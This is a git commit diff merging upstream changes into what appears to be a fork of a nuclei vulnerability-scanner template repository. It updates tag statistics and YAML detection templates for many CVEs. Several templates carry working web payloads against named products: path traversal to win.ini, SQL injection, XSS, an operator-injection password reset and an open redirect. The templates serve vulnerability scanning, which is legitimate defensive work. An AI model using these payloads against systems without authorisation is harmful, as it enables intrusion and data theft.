Merge branch 'projectdiscovery:master' into master

patch-1
idealphase 2022-05-11 00:19:52 +07:00 committed by GitHub
commit 32f0310f59
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
107 changed files with 2801 additions and 1758 deletions

View File

@ -1,21 +1,5 @@
cves/2021/CVE-2021-25111.yaml
cves/2021/CVE-2021-25118.yaml
cves/2021/CVE-2021-36356.yaml
cves/2021/CVE-2021-39312.yaml
cves/2022/CVE-2022-0165.yaml
cves/2022/CVE-2022-0201.yaml
cves/2022/CVE-2022-0288.yaml
cves/2022/CVE-2022-0422.yaml
cves/2022/CVE-2022-0543.yaml
cves/2022/CVE-2022-0591.yaml
cves/2022/CVE-2022-26352.yaml
cves/2022/CVE-2022-26564.yaml
exposed-panels/cyberoam-ssl-vpn-panel.yaml
exposed-panels/oracle-containers-panel.yaml
exposed-panels/oracle-enterprise-manager-login.yaml
exposed-panels/supermicro-bmc-panel.yaml
exposed-panels/xoops/xoops-installation-wizard.yaml
exposed-panels/zoneminder-login.yaml
exposures/files/desktop-ini-exposure.yaml
technologies/sucuri-firewall.yaml
vulnerabilities/wordpress/health-check-lfi.yaml
cves/2022/CVE-2022-1040.yaml
cves/2022/CVE-2022-29548.yaml
vulnerabilities/wordpress/newsletter-manager-open-redirect.yaml
vulnerabilities/wordpress/wp-security-open-redirect.yaml
vulnerabilities/wordpress/wp-under-construction-ssrf.yaml

View File

@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1131 | daffainfo | 559 | cves | 1135 | info | 1165 | http | 3129 |
| panel | 505 | dhiyaneshdk | 415 | exposed-panels | 511 | high | 861 | file | 60 |
| lfi | 457 | pikpikcu | 315 | vulnerabilities | 444 | medium | 649 | network | 49 |
| xss | 356 | pdteam | 262 | technologies | 250 | critical | 405 | dns | 17 |
| wordpress | 349 | geeknik | 177 | exposures | 202 | low | 178 | | |
| exposure | 289 | dwisiswant0 | 165 | misconfiguration | 194 | unknown | 6 | | |
| rce | 285 | 0x_akoko | 127 | workflows | 186 | | | | |
| cve2021 | 278 | princechaddha | 127 | token-spray | 153 | | | | |
| tech | 264 | gy741 | 116 | default-logins | 93 | | | | |
| wp-plugin | 251 | pussycat0x | 107 | takeovers | 67 | | | | |
| cve | 1150 | daffainfo | 560 | cves | 1154 | info | 1183 | http | 3164 |
| panel | 513 | dhiyaneshdk | 421 | exposed-panels | 519 | high | 870 | file | 68 |
| lfi | 460 | pikpikcu | 316 | vulnerabilities | 446 | medium | 658 | network | 50 |
| xss | 363 | pdteam | 262 | technologies | 251 | critical | 411 | dns | 17 |
| wordpress | 358 | geeknik | 178 | exposures | 203 | low | 180 | | |
| exposure | 292 | dwisiswant0 | 168 | misconfiguration | 196 | unknown | 6 | | |
| rce | 289 | princechaddha | 130 | workflows | 186 | | | | |
| cve2021 | 283 | 0x_akoko | 129 | token-spray | 153 | | | | |
| tech | 265 | gy741 | 117 | default-logins | 95 | | | | |
| wp-plugin | 259 | pussycat0x | 116 | file | 68 | | | | |
**254 directories, 3476 files**.
**260 directories, 3520 files**.
</td>
</tr>

File diff suppressed because one or more lines are too long

File diff suppressed because it is too large Load Diff

View File

@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1131 | daffainfo | 559 | cves | 1135 | info | 1165 | http | 3129 |
| panel | 505 | dhiyaneshdk | 415 | exposed-panels | 511 | high | 861 | file | 60 |
| lfi | 457 | pikpikcu | 315 | vulnerabilities | 444 | medium | 649 | network | 49 |
| xss | 356 | pdteam | 262 | technologies | 250 | critical | 405 | dns | 17 |
| wordpress | 349 | geeknik | 177 | exposures | 202 | low | 178 | | |
| exposure | 289 | dwisiswant0 | 165 | misconfiguration | 194 | unknown | 6 | | |
| rce | 285 | 0x_akoko | 127 | workflows | 186 | | | | |
| cve2021 | 278 | princechaddha | 127 | token-spray | 153 | | | | |
| tech | 264 | gy741 | 116 | default-logins | 93 | | | | |
| wp-plugin | 251 | pussycat0x | 107 | takeovers | 67 | | | | |
| cve | 1150 | daffainfo | 560 | cves | 1154 | info | 1183 | http | 3164 |
| panel | 513 | dhiyaneshdk | 421 | exposed-panels | 519 | high | 870 | file | 68 |
| lfi | 460 | pikpikcu | 316 | vulnerabilities | 446 | medium | 658 | network | 50 |
| xss | 363 | pdteam | 262 | technologies | 251 | critical | 411 | dns | 17 |
| wordpress | 358 | geeknik | 178 | exposures | 203 | low | 180 | | |
| exposure | 292 | dwisiswant0 | 168 | misconfiguration | 196 | unknown | 6 | | |
| rce | 289 | princechaddha | 130 | workflows | 186 | | | | |
| cve2021 | 283 | 0x_akoko | 129 | token-spray | 153 | | | | |
| tech | 265 | gy741 | 117 | default-logins | 95 | | | | |
| wp-plugin | 259 | pussycat0x | 116 | file | 68 | | | | |

View File

@ -26,4 +26,4 @@ network:
words:
- "SSH-1"
# Updated by Chris on 2022/01/21
# Enhanced by Chris on 2022/01/21

View File

@ -1,13 +1,14 @@
id: CVE-2005-2428
info:
name: Lotus Domino R5 and R6 WebMail Default Configuration Information Disclosure
name: Lotus Domino R5 and R6 WebMail - Information Disclosure
author: CasperGN
severity: medium
description: Lotus Domino R5 and R6 WebMail with 'Generate HTML for all fields' enabled allows remote attackers to read the HTML source to obtain sensitive information including the password hash in the HTTPPassword field, the password change date in the HTTPPasswordChangeDate field, and the client Lotus Domino release in the ClntBld field (a different vulnerability than CVE-2005-2696).
description: "Lotus Domino R5 and R6 WebMail with 'Generate HTML for all fields' enabled (which is by default) allows remote attackers to read the HTML source to obtain sensitive information including the password hash in the HTTPPassword field, the password change date in the HTTPPasswordChangeDate field, and the client Lotus Domino release in the ClntBld field (a different vulnerability than CVE-2005-2696)."
reference:
- http://www.cybsec.com/vuln/default_configuration_information_disclosure_lotus_domino.pdf
- https://www.exploit-db.com/exploits/39495
- https://nvd.nist.gov/vuln/detail/CVE-2005-2428
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
@ -31,4 +32,4 @@ requests:
- '(<a href="/names\.nsf/[0-9a-z\/]+\?OpenDocument)'
part: body
# Enhanced by mp on 2022/02/02
# Enhanced by mp on 2022/05/04

View File

@ -10,6 +10,9 @@ info:
- https://www.tenable.com/cve/CVE-2009-1872
classification:
cve-id: CVE-2009-1872
metadata:
verified: true
shodan-query: http.component:"Adobe ColdFusion"
tags: cve,cve2009,adobe,xss,coldfusion
requests:

View File

@ -33,3 +33,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/05/09

View File

@ -0,0 +1,36 @@
id: CVE-2017-11512
info:
name: ManageEngine ServiceDesk - Unauthenticated Arbitrary File Download
author: 0x_Akoko
severity: high
description: |
The ManageEngine ServiceDesk 9.3.9328 is vulnerable to arbitrary file downloads due to improper restrictions of the pathname used in the name parameter for the download-snapshot URL. An unauthenticated remote attacker can use this vulnerability to download arbitrary files.
reference:
- https://exploit.kitploit.com/2017/11/manageengine-servicedesk-cve-2017-11512.html
- https://www.cvedetails.com/cve/CVE-2017-11512
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2017-11512
cwe-id: CWE-22
metadata:
verified: true
shodan-query: http.title:"ManageEngine"
tags: cve,cve2017,manageengine,lfr,unauth
requests:
- method: GET
path:
- '{{BaseURL}}/fosagent/repl/download-file?basedir=4&filepath=..\..\Windows\win.ini'
- '{{BaseURL}}/fosagent/repl/download-snapshot?name=..\..\..\..\..\..\..\Windows\win.ini'
stop-at-first-match: true
matchers:
- type: word
part: body
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and

View File

@ -0,0 +1,37 @@
id: CVE-2018-11231
info:
name: Opencart Divido plugin - Sql Injection
author: ritikchaddha
severity: high
reference:
- http://foreversong.cn/archives/1183
- https://nvd.nist.gov/vuln/detail/CVE-2018-11231
tags: opencart,sqli,cve,cve2018
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.10
cve-id: CVE-2018-11231
cwe-id: CWE-89
description: "In the Divido plugin for OpenCart, there is SQL injection. Attackers can use SQL injection to get some confidential information."
requests:
- raw:
- |
POST /upload/index.php?route=extension/payment/divido/update HTTP/1.1
Host: {{Hostname}}
{"metadata":{"order_id":"1 and updatexml(1,concat(0x7e,(SELECT md5(202072102)),0x7e),1)"},"status":2}
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- "6f7c6dcbc380aac3bcba1f9fccec991e"
- type: status
status:
- 200

View File

@ -20,12 +20,18 @@ requests:
- method: POST
path:
- "{{BaseURL}}/wp-admin/admin.php"
body: 'icl_post_action=save_theme_localization&locale_file_name_en=EN"><script>alert(0);</script>'
redirects: true
body: |
icl_post_action=save_theme_localization&locale_file_name_en=EN"><script>alert(0);</script>
redirects: true
max-redirects: 2
matchers:
- type: dsl
dsl:
- 'contains(tolower(all_headers), "text/html") && contains(set_cookie, "_icl_current_admin_language") && contains(body, "\"><script>alert(0);</script>")'
- 'contains(tolower(all_headers), "text/html")'
- 'contains(set_cookie, "_icl_current_admin_language")'
- 'contains(body, "\"><script>alert(0);</script>")'
condition: and
# Enhanced by mp on 2022/04/08

View File

@ -0,0 +1,45 @@
id: CVE-2019-12962
info:
name: LiveZilla Server 8.0.1.0 - Cross Site Scripting
author: Clment Cruchet
severity: medium
description: |
LiveZilla Server 8.0.1.0 - Accept-Language Reflected XSS
reference:
- https://www.exploit-db.com/exploits/49669
- https://nvd.nist.gov/vuln/detail/CVE-2019-12962
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2019-12962
cwe-id: CWE-79
metadata:
verified: true
shodan-query: http.html:LiveZilla
tags: cve,cve2019,livezilla,xss
requests:
- method: GET
path:
- '{{BaseURL}}/mobile/index.php'
headers:
Accept-Language: ';alert(document.domain)//'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "var detectedLanguage = ';alert(document.domain)//';"
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200

View File

@ -14,17 +14,21 @@ info:
cvss-score: 6.1
cve-id: CVE-2019-14223
cwe-id: CWE-601
tags: cve,cve2019,redirect
tags: cve,cve2019,redirect,alfresco
requests:
- method: POST
path:
- '{{BaseURL}}/share/page/dologin'
headers:
Content-Type: application/x-www-form-urlencoded
body: success=%2Fshare%2Fpage%2F&failure=:\\google.com&username=baduser&password=badpass
body: |
success=%2Fshare%2Fpage%2F&failure=:\\example.com&username=baduser&password=badpass
matchers:
- type: regex
part: body
part: header
regex:
- "(?m)^(?:Location\\s*:\\s*)(?:https?://|//|\\\\)?(?:[a-zA-Z0-9\\-_]*\\.)?google\\.com(?:\\s*)$"
- "(?m)^(?:Location\\s*:\\s*)(?:https?://|//|\\\\)?(?:[a-zA-Z0-9\\-_]*\\.)?example\\.com(?:\\s*)$"

View File

@ -1,36 +0,0 @@
id: CVE-2019-15043
info:
name: Grafana unauthenticated API
author: bing0o
severity: high
description: In Grafana 2.x through 6.x before 6.3.4, parts of the HTTP API allow unauthenticated use. This makes it possible to run a denial of service attack against the server running Grafana.
reference:
- https://grafana.com/blog/2019/08/29/grafana-5.4.5-and-6.3.4-released-with-important-security-fix/
- https://community.grafana.com/t/grafana-5-4-5-and-6-3-4-security-update/20569 Vendor Advisory
- https://community.grafana.com/t/release-notes-v6-3-x/19202
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
cvss-score: 7.5
cve-id: CVE-2019-15043
cwe-id: CWE-306
tags: cve,cve2019,grafana
requests:
- raw:
- |
POST /api/snapshots HTTP/1.1
Host: {{Hostname}}
Connection: close
Content-Length: 235
Accept: */*
Accept-Language: en
Content-Type: application/json
{"dashboard": {"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows": [{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires": 3600}
matchers:
- part: body
type: word
words:
- deleteKey

View File

@ -1,11 +1,12 @@
id: CVE-2019-1821
info:
name: Cisco Prime Infrastructure Unauthorized RCE
name: Cisco Prime Infrastructure and Cisco Evolved Programmable Network Manager - Remote Code Execution
author: _0xf4n9x_
severity: critical
description: Cisco Prime Infrastructure Health Monitor HA TarArchive Directory Traversal Remote Code Execution Vulnerability.
description: Cisco Prime Infrastructure (PI) and Cisco Evolved Programmable Network (EPN) Manager could allow an authenticated, remote attacker to execute code with root-level privileges on the underlying operating system. This vulnerability exist because the software improperly validates user-supplied input. An attacker could exploit this vulnerability by uploading a malicious file to the administrative web interface. A successful exploit could allow the attacker to execute code with root-level privileges on the underlying operating system.
reference:
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190515-pi-rce
- https://srcincite.io/blog/2019/05/17/panic-at-the-cisco-unauthenticated-rce-in-prime-infrastructure.html
- https://nvd.nist.gov/vuln/detail/CVE-2019-1821
classification:
@ -49,3 +50,5 @@ requests:
- "status_code == 200"
- "contains((body_2), '{{randstr}}')"
condition: and
# Enhanced by mp on 2022/05/03

View File

@ -1,13 +1,14 @@
id: CVE-2019-18394
info:
name: Openfire Full Read SSRF
name: Ignite Realtime Openfire <=4.4.2 - Server-Side Request Forgery
author: pdteam
severity: critical
description: A Server Side Request Forgery (SSRF) vulnerability in FaviconServlet.java in Ignite Realtime Openfire through 4.4.2 allows attackers to send arbitrary HTTP GET requests.
description: Ignite Realtime Openfire through version 4.4.2 allows attackers to send arbitrary HTTP GET requests in FaviconServlet.java, resulting in server-side request forgery.
reference:
- https://swarm.ptsecurity.com/openfire-admin-console/
- https://github.com/igniterealtime/Openfire/pull/1497
- https://nvd.nist.gov/vuln/detail/CVE-2019-18394
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
@ -25,3 +26,5 @@ requests:
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
# Enhanced by mp on 2022/05/03

View File

@ -1,10 +1,10 @@
id: CVE-2019-18818
info:
name: strapi CMS Unauthenticated Admin Password Reset
name: strapi CMS <3.0.0-beta.17.5 - Admin Password Reset
author: idealphase
severity: critical
description: strapi CMS before 3.0.0-beta.17.5 mishandles password resets within packages/strapi-admin/controllers/Auth.js and packages/strapi-plugin-users-permissions/controllers/Auth.js.
description: "strapi CMS before 3.0.0-beta.17.5 allows admin password resets because it mishandles password resets within packages/strapi-admin/controllers/Auth.js and packages/strapi-plugin-users-permissions/controllers/Auth.js."
reference:
- https://github.com/advisories/GHSA-6xc2-mj39-q599
- https://www.exploit-db.com/exploits/50239
@ -23,7 +23,9 @@ requests:
Host: {{Hostname}}
Origin: {{BaseURL}}
Content-Type: application/json
{"code": {"$gt": 0}, "password": "SuperStrongPassword1", "passwordConfirmation": "SuperStrongPassword1"}
matchers-condition: and
matchers:
- type: status
@ -49,4 +51,5 @@ requests:
- .user.username
- .user.email
# Enhanced by mp on 2022/04/01
# Enhanced by mp on 2022/05/03

View File

@ -1,12 +1,13 @@
id: CVE-2019-19781
info:
name: Citrix ADC Directory Traversal
name: Citrix ADC and Gateway - Directory Traversal
author: organiccrap,geeknik
severity: critical
description: An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal.
description: Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0 are susceptible to directory traversal vulnerabilities.
reference:
- https://support.citrix.com/article/CTX267027
- https://nvd.nist.gov/vuln/detail/CVE-2019-19781
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
@ -28,3 +29,5 @@ requests:
- type: word
words:
- "[global]"
# Enhanced by mp on 2022/05/03

View File

@ -1,12 +1,12 @@
id: CVE-2019-2578
info:
name: Oracle WebCenter Sites Broken Access Control
name: Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0 - Broken Access Control
author: leovalcante
severity: high
description: Oracle WebCenter Sites 12.2.1.3.0 (a component of Oracle Fusion Middleware) suffers from broken access control. Successful attacks of this vulnerability can result in unauthorized access to critical
data or complete access to all Oracle WebCenter Sites accessible data.
description: Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0 suffers from broken access control. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebCenter Sites accessible data.
reference:
- https://www.oracle.com/security-alerts/cpuapr2019.html
- https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites
- https://nvd.nist.gov/vuln/detail/CVE-2019-2578
classification:
@ -32,4 +32,5 @@ requests:
regex:
- '<script[\d\D]*<throwexception/>'
# Enhanced by mp on 2022/04/06
# Enhanced by mp on 2022/05/04

View File

@ -1,14 +1,14 @@
id: CVE-2019-2579
info:
name: Oracle WebCenter Sites - SQL Injection
name: Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0 - SQL Injection
author: leovalcante
severity: medium
description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware. The supported version that is affected is 12.2.1.3.0. Easily exploitable vulnerability allows low privileged attacker
with network access via HTTP to compromise Oracle WebCenter Sites. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle WebCenter Sites accessible data.
description: The Oracle WebCenter Sites component of Oracle Fusion Middleware 12.2.1.3.0 is susceptible to SQL injection via an easily exploitable vulnerability that allows low privileged attackers with network access via HTTP to compromise Oracle WebCenter Sites. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle WebCenter Sites accessible data.
reference:
- https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites
- https://github.com/Leovalcante/wcs_scanner
- https://nvd.nist.gov/vuln/detail/CVE-2019-2579
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
cvss-score: 4.3
@ -49,3 +49,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/05/04

View File

@ -1,15 +1,16 @@
id: CVE-2019-2725
info:
name: Oracle WebLogic Server - Unauthenticated RCE
name: Oracle WebLogic Server - Remote Command Execution
author: dwisiswant0
severity: critical
description: |
Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services). Supported versions that are affected are 10.3.6.0.0 and 12.1.3.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server.
The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services) allows unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server. Versions that are affected are 10.3.6.0.0 and 12.1.3.0.0.
reference:
- https://paper.seebug.org/910/
- https://www.exploit-db.com/exploits/46780/
- https://www.oracle.com/security-alerts/cpujan2020.html
- https://nvd.nist.gov/vuln/detail/CVE-2019-2725
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
@ -43,3 +44,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/05/03

View File

@ -1,14 +1,13 @@
id: CVE-2019-3396
info:
name: Atlassian Confluence Path Traversal
name: Atlassian Confluence Server - Path Traversal
author: harshbothra_
severity: critical
description: The Widget Connector macro in Atlassian Confluence Server before version 6.6.12 (the fixed version for 6.6.x), from version 6.7.0 before 6.12.3 (the fixed version for 6.12.x), from version 6.13.0 before
6.13.3 (the fixed version for 6.13.x), and from version 6.14.0 before 6.14.2 (the fixed version for 6.14.x), allows remote attackers to achieve path traversal and remote code execution on a Confluence Server
or Data Center instance via server-side template injection.
description: The Widget Connector macro in Atlassian Confluence Server before version 6.6.12 (the fixed version for 6.6.x), from version 6.7.0 before 6.12.3 (the fixed version for 6.12.x), from version 6.13.0 before 6.13.3 (the fixed version for 6.13.x), and from version 6.14.0 before 6.14.2 (the fixed version for 6.14.x), allows remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection.
reference:
- https://github.com/x-f1v3/CVE-2019-3396
- https://nvd.nist.gov/vuln/detail/CVE-2019-3396
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
@ -36,3 +35,5 @@ requests:
- type: word
words:
- "<param-name>contextConfigLocation</param-name>"
# Enhanced by mp on 2022/05/03

View File

@ -1,12 +1,10 @@
id: CVE-2019-3929
info:
name: Barco/AWIND OEM Presentation Platform Unauthenticated Remote Command Injection (CVE-2019-3929)
name: Barco/AWIND OEM Presentation Platform - Remote Command Injection
author: _0xf4n9x_
severity: critical
description: The Crestron AM-100 firmware 1.6.0.2, Crestron AM-101 firmware 2.7.0.1, Barco wePresent WiPG-1000P firmware 2.3.0.10, Barco wePresent WiPG-1600W before firmware 2.4.1.19, Extron ShareLink 200/250 firmware
2.0.3.4, Teq AV IT WIPS710 firmware 1.1.0.7, SHARP PN-L703WA firmware 1.4.2.3, Optoma WPS-Pro firmware 1.0.0.5, Blackbox HD WPS firmware 1.0.0.5, InFocus LiteShow3 firmware 1.0.16, and InFocus LiteShow4 2.0.0.7
are vulnerable to command injection via the file_transfer.cgi HTTP endpoint. A remote, unauthenticated attacker can use this vulnerability to execute operating system commands as root.
description: The Crestron AM-100 firmware 1.6.0.2, Crestron AM-101 firmware 2.7.0.1, Barco wePresent WiPG-1000P firmware 2.3.0.10, Barco wePresent WiPG-1600W before firmware 2.4.1.19, Extron ShareLink 200/250 firmware 2.0.3.4, Teq AV IT WIPS710 firmware 1.1.0.7, SHARP PN-L703WA firmware 1.4.2.3, Optoma WPS-Pro firmware 1.0.0.5, Blackbox HD WPS firmware 1.0.0.5, InFocus LiteShow3 firmware 1.0.16, and InFocus LiteShow4 2.0.0.7 are vulnerable to command injection via the file_transfer.cgi HTTP endpoint. A remote, unauthenticated attacker can use this vulnerability to execute operating system commands as root.
reference:
- http://packetstormsecurity.com/files/152715/Barco-AWIND-OEM-Presentation-Platform-Unauthenticated-Remote-Command-Injection.html
- https://www.exploit-db.com/exploits/46786/
@ -33,3 +31,5 @@ requests:
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
# Enhanced by mp on 2022/05/03

View File

@ -1,13 +1,13 @@
id: CVE-2019-5127
info:
name: YouPHPTube Encoder RCE
name: YouPHPTube Encoder 2.3 - Remote Command Injection
author: pikpikcu
severity: critical
description: A command injection vulnerability has been found in YouPHPTube Encoder. A successful attack could allow an attacker to compromise the server. Exploitable unauthenticated command injections exist in
YouPHPTube Encoder 2.3, a plugin for providing encoder functionality in YouPHPTube. The parameter base64Url in /objects/getImage.php is vulnerable to a command injection attack.
description: "YouPHPTube Encoder 2.3 is susceptible to a command injection vulnerability which could allow an attacker to compromise the server. These exploitable unauthenticated command injections exist via the parameter base64Url in /objects/getImage.php."
reference:
- https://talosintelligence.com/vulnerability_reports/TALOS-2019-0917
- https://nvd.nist.gov/vuln/detail/CVE-2019-5127
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
@ -47,3 +47,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/05/03

View File

@ -1,13 +1,13 @@
id: CVE-2019-6112
info:
name: WordPress Plugin Sell Media v2.4.1 - Cross-Site Scripting
name: WordPress Sell Media 2.4.1 - Cross-Site Scripting
author: dwisiswant0
severity: medium
description: A Cross-site scripting (XSS) vulnerability in /inc/class-search.php in the Sell Media plugin v2.4.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the keyword parameter
(aka $search_term or the Search field).
description: "WordPress Plugin Sell Media v2.4.1 contains a cross-site scripting vulnerability in /inc/class-search.php that allows remote attackers to inject arbitrary web script or HTML via the keyword parameter (aka $search_term or the Search field)."
reference:
- https://github.com/graphpaperpress/Sell-Media/commit/8ac8cebf332e0885863d0a25e16b4b180abedc47#diff-f16fea0a0c8cc36031ec339d02a4fb3b
- https://nvd.nist.gov/vuln/detail/CVE-2019-6112
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@ -30,3 +30,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/05/04

View File

@ -1,13 +1,14 @@
id: CVE-2019-7238
info:
name: NEXUS < 3.14.0 Remote Code Execution
name: Sonatype Nexus Repository Manager <3.15.0 - Remote Code Execution
author: pikpikcu
severity: critical
description: Sonatype Nexus Repository Manager before 3.15.0 has Incorrect Access Control.
description: Sonatype Nexus Repository Manager before 3.15.0 is susceptible to remote code execution.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2019-7238
- https://github.com/jas502n/CVE-2019-7238
- https://support.sonatype.com/hc/en-us/articles/360017310793-CVE-2019-7238-Nexus-Repository-Manager-3-Missing-Access-Controls-and-Remote-Code-Execution-February-5th-2019
- https://nvd.nist.gov/vuln/detail/CVE-2019-7238
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
@ -34,3 +35,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/05/03

View File

@ -4,10 +4,11 @@ info:
name: eMerge E3 1.00-06 - Remote Code Execution
author: pikpikcu
severity: critical
description: Linear eMerge E3-Series devices allow Command Injections.
description: Linear eMerge E3-Series devices are susceptible to remote code execution vulnerabilities.
reference:
- https://www.exploit-db.com/exploits/47619
- http://linear-solutions.com/nsc_family/e3-series/
- https://nvd.nist.gov/vuln/detail/CVE-2019-7256
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
@ -34,3 +35,5 @@ requests:
- type: regex
regex:
- "root:.*:0:0:"
# Enhanced by mp on 2022/05/03

View File

@ -1,14 +1,14 @@
id: CVE-2019-7609
info:
name: Kibana Timelion Arbitrary Code Execution
name: Kibana Timelion - Arbitrary Code Execution
author: dwisiswant0
severity: critical
description: Kibana versions before 5.6.15 and 6.6.1 contain an arbitrary code execution flaw in the Timelion visualizer. An attacker with access to the Timelion application could send a request that will attempt
to execute javascript code. This could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system.
description: Kibana versions before 5.6.15 and 6.6.1 contain an arbitrary code execution flaw in the Timelion visualizer. An attacker with access to the Timelion application could send a request that will attempt to execute javascript code. This could possibly lead to an attacker executing arbitrary commands with permissions of the Kibana process on the host system.
reference:
- https://github.com/mpgn/CVE-2019-7609
- https://discuss.elastic.co/t/elastic-stack-6-6-1-and-5-6-15-security-update/169077
- https://nvd.nist.gov/vuln/detail/CVE-2019-7609
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
@ -40,3 +40,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/05/03

View File

@ -1,10 +1,10 @@
id: CVE-2019-8982
info:
name: Wavemaker Studio 6.6 Local File Inclusion/Server-Side Request Forgery
name: Wavemaker Studio 6.6 - Local File Inclusion/Server-Side Request Forgery
author: madrobot
severity: critical
description: WaveMaker Studio 6.6 mishandles the studioService.download?method=getContent&inUrl= value in com/wavemaker/studio/StudioService.java, leading to disclosure of local files and server-side request forgery.
description: "WaveMaker Studio 6.6 mishandles the studioService.download?method=getContent&inUrl= value in com/wavemaker/studio/StudioService.java, leading to disclosure of local files and server-side request forgery."
reference:
- https://www.exploit-db.com/exploits/45158
- https://nvd.nist.gov/vuln/detail/CVE-2019-8982
@ -29,4 +29,5 @@ requests:
- "root:.*:0:0:"
part: body
# Enhanced by mp on 2022/04/18
# Enhanced by mp on 2022/05/03

View File

@ -1,10 +1,10 @@
id: CVE-2019-9618
info:
name: WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion (LFI)
name: WordPress GraceMedia Media Player 1.0 - Local File Inclusion
author: daffainfo
severity: critical
description: The GraceMedia Media Player plugin 1.0 for WordPress allows Local File Inclusion via the cfg parameter.
description: WordPress GraceMedia Media Player plugin 1.0 is susceptible to local file inclusion via the cfg parameter.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9618
- https://seclists.org/fulldisclosure/2019/Mar/26
@ -32,3 +32,5 @@ requests:
status:
- 200
- 500
# Enhanced by mp on 2022/05/03

View File

@ -1,10 +1,10 @@
id: CVE-2019-9670
info:
name: Zimbra Collaboration XXE
name: Synacor Zimbra Collaboration <8.7.11p10 - XML External Entity Injection
author: ree4pwn
severity: critical
description: Mailboxd component in Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10 has an XML External Entity injection (XXE) vulnerability.
description: Synacor Zimbra Collaboration Suite 8.7.x before 8.7.11p10 has an XML external entity injection (XXE) vulnerability via the mailboxd component.
reference:
- https://www.exploit-db.com/exploits/46693/
- https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories
@ -12,6 +12,7 @@ info:
- http://www.rapid7.com/db/modules/exploit/linux/http/zimbra_xxe_rce
